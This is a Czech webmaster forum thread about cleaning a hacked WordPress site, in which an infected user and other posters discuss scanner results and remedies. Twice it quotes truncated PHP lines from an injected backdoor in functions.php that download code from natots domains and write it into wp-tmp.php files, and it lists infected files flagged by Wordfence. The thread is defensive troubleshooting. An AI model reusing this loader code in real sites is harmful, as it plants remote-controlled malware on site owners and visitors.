Zadejte hledaný výraz...

WordPress – Antivirus ukazuje virus ve function.php, tam jsem, ale vše promazal.

Petr Gargulák
verified
rating uzivatele
(8 hodnocení)
30. 3. 2019 11:28:59
Pročistil jsem functions.php, ale stále mi ukazuje plugin Antivirus , že v šabloně ve functions php je něco , ale tam nic takového neni...
Jinak mi asi prosím doporučte nejlepší postup na odvirování wordpresu. nejlepší plugin třeba....a tak.
Tohle je functions.php
Zpráva pluginu antivir:
/themes/understrap/functions.php
This is not a virus
if ($file = @file_get_contents(__FILE__))
This is not a virus
@file_put_contents(__FILE__, $file);
This is not a virus
if ($file = @file_get_contents(__FILE__))
This is not a virus
@file_put_contents(__FILE__, $file);
This is not a virus
$ch = curl_init();
This is not a virus
$data = curl_exec($ch);
This is not a virus
$handle = fopen($tmpfname, "w+");
This is not a virus
$handle = fopen($tmpfname, "w+");
This is not a virus
fclose($handle);
This is not a virus
if (($tmpcontent = @file_get_contents("http://www.natots.com/code.php") OR $tmp ...
This is not a virus
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpc ...
This is not a virus
@file_put_contents(get_template_directory() . '/wp-tmp.php', ...
This is not a virus
@file_put_contents('wp-tmp.php', $tmpcontent);
This is not a virus
elseif ($tmpcontent = @file_get_contents("http://www.natots.pw/code.php") AND str ...
This is not a virus
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpc ...
This is not a virus
@file_put_contents(get_template_directory() . '/wp-tmp.php', ...
This is not a virus
@file_put_contents('wp-tmp.php', $tmpcontent);
This is not a virus
elseif ($tmpcontent = @file_get_contents("http://www.natots.xyz/code.php") AND st ...
This is not a virus
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpc ...
This is not a virus
@file_put_contents(get_template_directory() . '/wp-tmp.php', ...
This is not a virus
@file_put_contents('wp-tmp.php', $tmpcontent);
This is not a virus
elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND s ...
This is not a virus
} elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') ...
This is not a virus
} elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $w ...
30. 3. 2019 11:28:59
https://webtrh.cz/diskuse/wordpress-antivirus-ukazuje-virus-ve-function-php-tam-jsem-ale-vse-promazal/#reply1394994
tomve
verified
rating uzivatele
(22 hodnocení)
30. 3. 2019 11:38:45
Zkus toto - https://wordpress.org/plugins/wordfence/ .. pomohl zatím všude, kde něco bylo.
Občas tyhle věci hazí false positive.
---------- Post added 30.03.2019 at 11:43 ----------
btw ten kód není normální, z understrap/functions.php, smazat
30. 3. 2019 11:38:45
https://webtrh.cz/diskuse/wordpress-antivirus-ukazuje-virus-ve-function-php-tam-jsem-ale-vse-promazal/#reply1394993
Petr Gargulák
verified
rating uzivatele
(8 hodnocení)
30. 3. 2019 12:40:56
Ten kod jsem nenašel, ale byl tam nějakej balast a ten jsem smazal
a udělal jsem scan na wordfence....
File appears to be malicious: wp-content/themes/understrap/functions.php
Type: File
Issue Found 30. 3. 2019 12:38
Critical
Repair
Ignore
Details
Need help with a hacked website?
Our team of security experts will clean the infection and remove malicious content. Once your site is restored we will provide a detailed report of our findings. Includes a 1-year Wordfence Premium license.
File appears to be malicious: wp-content/plugins/search-filter-pro/admin/class-search-filter-admin.php
Type: File
Issue Found 30. 3. 2019 12:38
Critical
Ignore
Details
File appears to be malicious: wp-includes/post.php
Type: File
Issue Found 30. 3. 2019 12:38
Critical
Repair
Ignore
Details
File appears to be malicious: wp-includes/wp-vcd.php
Type: File
Issue Found 30. 3. 2019 12:38
Critical
Ignore
Details
File appears to be malicious: wp-includes/wp-tmp.php
Type: File
Issue Found 30. 3. 2019 12:38
Critical
Ignore
Details
WordPress core file modified: wp-includes/general-template.php
Type: File
Issue Found 30. 3. 2019 12:33
High
Repair
Ignore
Details
WordPress core file modified: wp-includes/post.php
Type: File
Issue Found 30. 3. 2019 12:33
High
Repair
Ignore
Details
Unknown file in WordPress core: wp-includes/wp-feed.php
Type: File
Issue Found 30. 3. 2019 12:33
High
Ignore
Details
Unknown file in WordPress core: wp-includes/wp-tmp.php
Type: File
Issue Found 30. 3. 2019 12:33
High
Ignore
Details
Unknown file in WordPress core: wp-includes/wp-vcd.php
Type: File
Issue Found 30. 3. 2019 12:33
Hig
30. 3. 2019 12:40:56
https://webtrh.cz/diskuse/wordpress-antivirus-ukazuje-virus-ve-function-php-tam-jsem-ale-vse-promazal/#reply1394992
tomve
verified
rating uzivatele
(22 hodnocení)
30. 3. 2019 13:49:45
To chce pročistit někým, kdo tomu rozumí.
30. 3. 2019 13:49:45
https://webtrh.cz/diskuse/wordpress-antivirus-ukazuje-virus-ve-function-php-tam-jsem-ale-vse-promazal/#reply1394991
Petr Kývala
verified
rating uzivatele
(45 hodnocení)
30. 3. 2019 15:16:51
Napsal PetrGargulák;1519658
Pročistil jsem functions.php, ale stále mi ukazuje plugin Antivirus , že v šabloně ve functions php je něco , ale tam nic takového neni...
Jinak mi asi prosím doporučte nejlepší postup na odvirování wordpresu. nejlepší plugin třeba....a tak.
Tohle je functions.php
Zpráva pluginu antivir:
/themes/understrap/functions.php
This is not a virus
if ($file = @file_get_contents(__FILE__))
This is not a virus
@file_put_contents(__FILE__, $file);
This is not a virus
if ($file = @file_get_contents(__FILE__))
This is not a virus
@file_put_contents(__FILE__, $file);
This is not a virus
$ch = curl_init();
This is not a virus
$data = curl_exec($ch);
This is not a virus
$handle = fopen($tmpfname, "w+");
This is not a virus
$handle = fopen($tmpfname, "w+");
This is not a virus
fclose($handle);
This is not a virus
if (($tmpcontent = @file_get_contents("http://www.natots.com/code.php") OR $tmp ...
This is not a virus
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpc ...
This is not a virus
@file_put_contents(get_template_directory() . '/wp-tmp.php', ...
This is not a virus
@file_put_contents('wp-tmp.php', $tmpcontent);
This is not a virus
elseif ($tmpcontent = @file_get_contents("http://www.natots.pw/code.php") AND str ...
This is not a virus
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpc ...
This is not a virus
@file_put_contents(get_template_directory() . '/wp-tmp.php', ...
This is not a virus
@file_put_contents('wp-tmp.php', $tmpcontent);
This is not a virus
elseif ($tmpcontent = @file_get_contents("http://www.natots.xyz/code.php") AND st ...
This is not a virus
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpc ...
This is not a virus
@file_put_contents(get_template_directory() . '/wp-tmp.php', ...
This is not a virus
@file_put_contents('wp-tmp.php', $tmpcontent);
This is not a virus
elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND s ...
This is not a virus
} elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') ...
This is not a virus
} elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $w ...
To není chyba pouze ve functions.
30. 3. 2019 15:16:51
https://webtrh.cz/diskuse/wordpress-antivirus-ukazuje-virus-ve-function-php-tam-jsem-ale-vse-promazal/#reply1394990
A proč si neuděláš zálohu DB a nenahraješ čistou instalaci WP? Nebude to rychlejší?
30. 3. 2019 15:58:13
https://webtrh.cz/diskuse/wordpress-antivirus-ukazuje-virus-ve-function-php-tam-jsem-ale-vse-promazal/#reply1394989
Taps
verified
rating uzivatele
(118 hodnocení)
30. 3. 2019 16:39:41
neni to jen o pluginu ale hlavne o znalostech
30. 3. 2019 16:39:41
https://webtrh.cz/diskuse/wordpress-antivirus-ukazuje-virus-ve-function-php-tam-jsem-ale-vse-promazal/#reply1394988
Petr Gargulák
verified
rating uzivatele
(8 hodnocení)
30. 3. 2019 17:29:14
Tak kdo chce , ať sem hodí cenu za kterou to dá nebo mě do zpráv jak kdo chce, poptávám zrychlení a odvirování wordpresu.
30. 3. 2019 17:29:14
https://webtrh.cz/diskuse/wordpress-antivirus-ukazuje-virus-ve-function-php-tam-jsem-ale-vse-promazal/#reply1394987
Proč to budeš u někoho poptávat? Udělej zálohu DB a nahraj čistý WP ne?
30. 3. 2019 18:31:56
https://webtrh.cz/diskuse/wordpress-antivirus-ukazuje-virus-ve-function-php-tam-jsem-ale-vse-promazal/#reply1394986
tomve
verified
rating uzivatele
(22 hodnocení)
30. 3. 2019 18:40:54
Napsal Wladass;1519693
Proč to budeš u někoho poptávat? Udělej zálohu DB a nahraj čistý WP ne?
To bys musel vědět na jistotu, že db je čistá
---------- Post added 30.03.2019 at 18:45 ----------
Nemluvě o faktu, že wp-content nemůžeš jen tak smazat.
30. 3. 2019 18:40:54
https://webtrh.cz/diskuse/wordpress-antivirus-ukazuje-virus-ve-function-php-tam-jsem-ale-vse-promazal/#reply1394985
Nejsem si úplně jistý, ale neznám způsob, přes který by šlo napadnout WP skrze nečistou db, jak udáváš.
30. 3. 2019 19:02:27
https://webtrh.cz/diskuse/wordpress-antivirus-ukazuje-virus-ve-function-php-tam-jsem-ale-vse-promazal/#reply1394984
tomve
verified
rating uzivatele
(22 hodnocení)
30. 3. 2019 19:06:49
Napsal Wladass;1519697
Nejsem si úplně jistý, ale neznám způsob, přes který by šlo napadnout WP skrze nečistou db, jak udáváš.
Třeba tak, že v příspěvcich jsou js skripta, které dělají bordel. Nedávno jsem našel skript, který tvořil adminy (takže do nového wp se stejně dostanou) apd. To, že vyřešíš ftp neznamená, že vyřešíš db.
30. 3. 2019 19:06:49
https://webtrh.cz/diskuse/wordpress-antivirus-ukazuje-virus-ve-function-php-tam-jsem-ale-vse-promazal/#reply1394983
Jiří
verified
rating uzivatele
(7 hodnocení)
30. 3. 2019 19:23:39
Napsal Wladass;1519697
Nejsem si úplně jistý, ale neznám způsob, přes který by šlo napadnout WP skrze nečistou db, jak udáváš.
To jsem si před x lety myslel také, než jsem se setkal s napadenou databází u phpbb.
30. 3. 2019 19:23:39
https://webtrh.cz/diskuse/wordpress-antivirus-ukazuje-virus-ve-function-php-tam-jsem-ale-vse-promazal/#reply1394982
Napsal Tomve;1519700
Třeba tak, že v příspěvcich jsou js skripta, které dělají bordel. Nedávno jsem našel skript, který tvořil adminy (takže do nového wp se stejně dostanou) apd. To, že vyřešíš ftp neznamená, že vyřešíš db.
Zajímavé, to jsem nevěděl. Dík za poznatek.
30. 3. 2019 20:05:15
https://webtrh.cz/diskuse/wordpress-antivirus-ukazuje-virus-ve-function-php-tam-jsem-ale-vse-promazal/#reply1394981
Napsal Depotys;1519701
To jsem si před x lety myslel také, než jsem se setkal s napadenou databází u phpbb.
Útočník si vytvořil uživatele s admin právy? :)
3. 4. 2019 16:07:28
https://webtrh.cz/diskuse/wordpress-antivirus-ukazuje-virus-ve-function-php-tam-jsem-ale-vse-promazal/#reply1394980
Pro odpověď se přihlašte.
Přihlásit